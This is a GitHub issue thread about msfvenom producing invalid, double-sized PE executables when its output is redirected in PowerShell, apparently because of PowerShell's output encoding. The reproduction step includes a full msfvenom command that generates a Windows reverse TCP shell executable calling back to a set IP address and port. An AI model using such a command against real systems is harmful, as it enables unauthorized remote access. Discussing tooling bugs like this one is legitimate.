### ISSUE TITLE
msfvenom generating invalid PE format exe's if run in Powershell, around double the expected filesize

### ISSUE THREAD

**Issue by wesinator** [rapid7/metasploit-framework#13901]
## Steps to reproduce

How'd you do it?

1. In powershell, run `.\msfvenom -p windows/shell/reverse_tcp LHOST=10.10.0.10 LPORT=4444 -f exe > shell-x86.exe`
```powershell
PS C:\metasploit-framework\bin> .\msfvenom -p windows/shell/reverse_tcp LHOST=10.10.0.10 LPORT=4444 -f exe > shell-x86.exe
C:/metasploit-framework/embedded/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11.3/lib/active_support/dependencies.rb:274: warning: Win32API is deprecated after Ruby 1.9.1; use fiddle directly instead
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
```

also reproduced this issue generating the x64 shell payload exe

the valid PE is generated if run under cmd.exe

Windows 10 1809 64-bit
metasploit 5.0.100 

## Were you following a specific guide/tutorial or reading documentation?

https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/

## Expected behavior

32-bit generates valid PE exe, 73802 bytes

## Current behavior

The command generated an invalid 148682 byte file (around double the expected size, `73802*2`) with extra characters that break the PE format exe : 
<img width="1466" alt="image" src="https://user-images.githubusercontent.com/5124946/88422110-accc4980-cdb7-11ea-99c6-5a4a355ab07f.png">

for example the MZ header is invalid, it's wide with extra null bytes added

### Metasploit version

5.0.100

### I installed Metasploit with:
- [ ] Kali package via apt
- [ ] Omnibus installer (nightly)
- [x] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- [ ] Source install (please specify ruby version)

### OS

Windows 10 1809 64-bit

There seemed to be some issues with the msi install and Windows Defender, but everything else seems to work and the WinDef issue was addressed.

**Comment by wesinator** [comment]
So this is probably an output encoding issue with Powershell, rather than a bug in metasploit ? 

However, this should probably be noted in documentation and tutorials as it seems this isn't caveated

**Comment by HriSingh** [comment]
hiii 
![Capture](https://user-images.githubusercontent.com/60318362/122686204-9f207d80-d22d-11eb-958e-bf9800a1b36c.PNG)
please help

**Comment by HriSingh** [comment]
i am getting PE signature error 
@wesinator
